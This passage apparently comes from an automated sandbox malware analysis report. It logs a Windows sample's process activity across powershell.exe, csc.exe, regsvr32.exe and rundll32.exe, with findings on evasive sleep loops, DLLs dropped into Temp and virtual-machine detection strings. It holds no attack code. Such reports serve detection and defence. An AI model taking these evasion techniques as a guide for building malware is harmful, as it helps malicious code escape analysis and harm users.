Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7084	Thread sleep time: -1773297476s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7084	Thread sleep count: 799 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5772	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5612	Thread sleep count: 6259 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5676	Thread sleep count: 2927 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2620	Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648	Thread sleep count: 6479 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5704	Thread sleep count: 2798 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 452	Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5224	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5224	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5152	Thread sleep time: -11990383647911201s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.dll	Jump to dropped file

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\loaddll32.exe	Window / User API: threadDelayed 390	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Window / User API: threadDelayed 799	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 1425	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 506	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 1129	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 1555	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 870	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 862	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6259
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2927
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6479
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2798
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1803
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6739
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2705

Source: C:\Windows\System32\loaddll32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361113599.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.338033120.000000000336B000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWh4[
Source: rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.914184707.0000000000FA1000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.522837424.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.338394833.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW-b^u
Source: mshta.exe, 00000016.00000003.382843473.000001823555B000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\7p
Source: loaddll32.exe, 00000000.00000003.522936760.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317739016.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.686994186.0000000001344000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.372896811.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.523272114.000000000130A000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361113599.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 